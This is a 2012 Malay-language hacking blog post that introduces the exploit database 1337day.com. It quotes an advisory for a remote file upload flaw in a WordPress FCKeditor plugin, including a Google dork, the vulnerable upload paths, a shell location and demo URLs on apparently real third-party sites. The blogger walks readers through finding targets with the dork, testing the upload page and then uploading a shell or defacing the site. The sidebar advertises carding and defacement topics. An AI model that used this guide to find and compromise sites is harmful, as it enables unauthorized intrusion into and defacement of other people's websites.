Thursday, 5 April 2012

Jom Kenali 1337day.com

1337day.com apa itu? ok 1337day.com ialah tempat terkumpulnya segal jenis vulnerability

website,software,OS dan macam-macam lagi tempat ni sangat berguna untuk para

penetration tester atau singkatnya sebagai " pentest " kita jugak boleh membuat kajian tentang tahap keselamatan website kita.

ok, disini aku bagi contoh. tentang exploit di bwah ni


Spoiler


Quote
#### # Exploit Title: WordPress deans with pwwangs code plugin for wordpress (FCKeditor) Remote File Upload
# Author: T0x!c
# Date : 28/03/2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"
# Download: http://wordpress.org...-for-wordpress/
# Version: 1.0.0
# Tested on: [Windows Xp]
####

[ Vulnerable File ]

http://127.0.0.1/wp-...uploadtest.html
or
http://127.0.0.1/wp-...ctors/test.html

[ Shell ]

http://127.0.0.1/Use...es/YourFile.txt

# Demo :
http://cougardating....pload/test.html
http://www.cereuswom...uploadtest.html
https://scandlearn.c...ctors/test.html
http://blog.nextleve...tors/test.html#

=================================**AlgeriansHackers**==================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov *
(exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz)
=======================================================================================



exploit di atas ni megatakan yang wordpress plugin fckeditor mempunyai upload vurnerbility

dia juga memberi info tentang POC [ Proof of concept ] ok anthrax terangkan bagai mana nak memahami POC dia

di sini dia megatakan kita mesti mencari website t'sebut degan google dork. dork dia ialah ni.


Quote
inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"


bila kita dah jumpa website t'sebut, kita akan test jika website tu Vlun atau pun tak degan cara letak cam ni


Quote
www.site.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html


atau pun


Quote
www.site.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html



bila kita dah jumpa tempat untuk upload sesuatu, iyanya bermaksud website

tersebut adalah vlun. dan bekemunginan besar yang website tu boleh kita exploit degan mengupload shell, deface pages dan macam2 cara lagi.

di bawah ni adalah website-website yang vlun yang berdasarkan dari POC di atas.

Spoiler



ok sampai sini shaja nanti lain kali  nak share lagi benda-benda yang hebat-hebat!
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Updates Via E-Mail

subcribe rss feedRSS

Labels

007 Legends (1) 007 Legends repack (1) 007 Legends-Black Box (1) 007 Legends-Black Box repack (1) 2K Games (1) 2K Marin (1) Action (8) Action RPG (5) Activision Blizzard (3) Alan Wake American Nightmare (1) Alan Wake American Nightmare-Black Box (1) ANARCHY (5) Antara AES dan pemandu kereta perasan bijak (1) antivirus (6) ARTIKEL (90) Bethesda Softworks (2) Binary Domain (2) BioShock 2 (1) BioWare Corporation (1) bitComposer Games (1) Bugbear Entertainment (1) Call of Duty: Modern Warfare 3 (1) Call of Duty: Modern Warfare 3-Black Box (1) CARDING (3) CD Projekt Red Studio (1) CERITA (7) CRACKER (18) Crysis 2 (1) Crytek Studios (1) Dark Souls: Prepare to Die Edition (1) Dark Souls: Prepare to Die Edition-Black Box (1) Darksiders (1) Darksiders II (1) Deface (1) Devil's Details (2) Digital Extremes (1) Doom 3:BFG Edition (1) Doom 3:BFG Edition-Black Box (1) EA Sports (1) Electronic Arts Inc. (4) ENGLISH MOVIE (29) Eurocom Entertainment Software (1) event (1) Exploit (76) FABLE III (1) Facebook Game Hack (1) FIFA 13 (1) FIFA 13-Black Box (1) Flashing (1) Flying Wild Hog (1) From Dust (1) From Dust-Black Box (1) From Software (1) gba games (1) Global Ops: Commando Libya (1) Global Ops: Commando Libya-Black Box (1) GORE (1) Hard Reset (1) Hard Reset-Black Box (1) HIJACK (2) History (3) id Software (1) iklan. (4) Infinity Ward (1) INFO (35) iPhone Jailbreak (9) ISU SEMASA (33) JOB (1) JOOMLA (1) KILLUMINATI (7) Konami (1) Lain-Lain Trick (1) LionHead Studios (1) MAKE MONEY (1) MALAY MOVIE (15) Mass Effect 2 (1) Max Payne 3 (1) Max Payne 3-Black Box (1) Maxis (1) Microsoft Game Studios (1) misteri (4) MOBILE (1) MUJAHID (27) music album mp3 (20) n-gage (1) Namco Bandai Games (3) NDS (1) Notepad Trick (1) OS (5) OTHER MOVIE LANGUES (8) PC GAME (141) photo (5) political (2) Pro Evolution Soccer 2013 (1) Pro Evolution Soccer 2013-Black Box (1) Prototype 2 (1) Prototype 2-Black Box (1) PS VITA (4) PS3 GAME (32) PSN GAME (6) PSP (7) PSPGAMES (4) puisi (1) putlocker games (5) Racing (1) Radical Entertainment (1) religion (12) Remedy Entertainment (1) repack game (1) REVEAL (32) Ridge Racer Unbounded-Black Box (1) Rockstar Games (1) S60v2 (1) Samsung U1000 (1) SEGA (2) SEO (2) Shooter (2) Shooting (2) Soalan bocor SPM 2012 ada di sini (1) Soft Skills Guide (1) software (31) Spectral Games (1) Sport (2) Strategy (1) SYSTEME (3) The Darkness II (1) The Darkness II-Black Box (1) The Elder Scrolls V: Skyrim (1) The Elder Scrolls V: Skyrim-Black Box (1) The Sims 3 (1) The Sims 3 Complete (1) The Sims 3 Complete-Black Box (1) The Witcher 2: Assassins of Kings (1) THQ Inc (2) tips (1) TOKOH (1) tool (2) Tutorial (30) TWEAK (6) Ubisoft Studios (1) UNDERGROUND (4) video movie (1) video music (1) Vigil Games (2) Website Hack (1) wii (2) XBOX360 (7) xboxone (1)

Total Pageviews

Blog Archive

LIST